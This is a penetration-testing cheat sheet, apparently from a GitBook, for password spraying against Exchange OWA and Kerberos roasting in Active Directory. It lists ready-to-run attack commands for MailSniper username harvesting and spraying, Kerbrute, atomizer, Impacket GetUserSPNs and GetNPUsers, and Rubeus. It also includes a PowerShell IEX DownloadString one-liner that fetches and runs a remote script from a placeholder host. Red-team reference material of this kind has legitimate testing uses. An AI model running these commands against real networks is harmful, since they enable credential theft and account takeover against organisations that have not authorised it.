Password Spray And Roasting

Owa

MailSniper

ipmo C: \Tools\MailSniper\MailSniper.ps1

Invoke-DomainHarvestOWA -ExchHostname 10.10.10.10 # Get Domain

Invoke-UsernameHarvestOWA -ExchHostname 10.10.10.10 -Domain <DOMAIN> -UserList .\usernames.txt -OutFile valid.txt # Get Valid Username using Time Attack

Invoke-PasswordSprayOWA -ExchHostname 10.10.10.10 -UserList .\valid.txt -Password Summer2021 # Spray One Password `Summer2021`

Get-GlobalAddressList -ExchHostname 10.10.10.10 -UserName <Domain>\<Valid_User> -Password <Valid_Password> -OutFile gal.txt # Dump All Username using Valid Creds.

SprayingToolkit

atomizer.py owa owa.domain.local <password to spray> -emails.txt

Kerbrute

kerbrute passwordspray -d <DOMAIN> --dc <IP Of DC> valid_users.txt <password to spray>

Kerberoast

Note: Sync Timezone and time with the target network. Windows => `tzdate /g` and Linux => rdate -n <targetip>

Impacket

GetUserSPNs.py <domain>/<username>:<password> -outputfile <outfile>

ASREPRoast

powershell.exe -Command 'IEX (New-Object Net.Webclient).DownloadString("http://<ip>:<port>/Invoke-ASREP.ps1");Invoke-ASREPRoast -Domain <DOMAIN Name> -Server <DOMAIN IP> | select -expand hash

Rubeus

Rubeus.exe kerberoast

ASREPRoast

GetNPUsers.py <domain>/ -usersfile users.txt -outputfile <outfile> -dc-ip <DC IP> # Without credentials, using a valid users list

GetNPUsers.py <domain>/<username>:<password> -request -outputfile <outfile> # Using Valid credentials

PreviousPowershell

Last updated 3 years ago